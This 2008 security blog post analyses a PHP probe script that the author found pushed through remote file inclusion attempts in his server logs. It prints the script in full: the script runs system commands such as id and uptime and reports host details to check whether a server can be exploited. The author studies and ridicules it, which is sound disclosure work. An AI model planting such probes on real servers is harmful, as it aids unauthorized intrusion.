« PHP based IRC botnet, fast-flux of course
A bunch of trackback spam from the stash »

Are Nigerians Evolving From The 419 Letters?

I was going through my access logs to see what nasties have been thrown at me since the last time.

Amongst the normal enter_your_RFI_exploit_here I saw this script being pushed onto the server:

<?

echo "BraT<br>";

$alb = @php_uname();

$alb2 = system(uptime);

$alb3 = system(id);

$alb4 = @getcwd();

$alb5 = getenv("SERVER_SOFTWARE");

$alb6 = phpversion();

$alb7 = $_SERVER['SERVER_NAME'];

$alb8 = gethostbyname($SERVER_ADDR);

$alb9 = get_current_user();

$os = @PHP_OS;

echo "os: $os<br>";

echo "uname -a: $alb<br>";

echo "uptime: $alb2<br>";

echo "id: $alb3<br>";

echo "pwd: $alb4<br>";

echo "user: $alb9<br>";

echo "phpv: $alb6<br>";

echo "SoftWare: $alb5<br>";

echo "ServerName: $alb7<br>";

echo "ServerAddr: $alb8<br>";

echo "NigeriaN HackerS TeaM<br>";

exit;

?>

As you can see it’s just a preamble script to detect whether the server is vulnerable or not. If they are evolving from the ancient scams they sure have a long way to achieve the correct 1337h4×0r levels that other RFI pushers have achieved. So guys, give us more caps!

Penetration Testing
Fitsec Ltd - The Evil Eye Penetration Testing Service
http://www.fitsec.com/en

This entry was posted on Tuesday, February 12th, 2008 at 9:20 am and is filed under General InfoSec, Malware FreakShow. You can follow any responses to this entry through the RSS 2.0 feed. Responses are currently closed, but you can trackback from your own site.

Comments are closed.

If you want to comment on this article please send e-mail
to authors(_at_)teamfurry.com or go to the forums.

InspectorWordpress has prevented 2 attacks.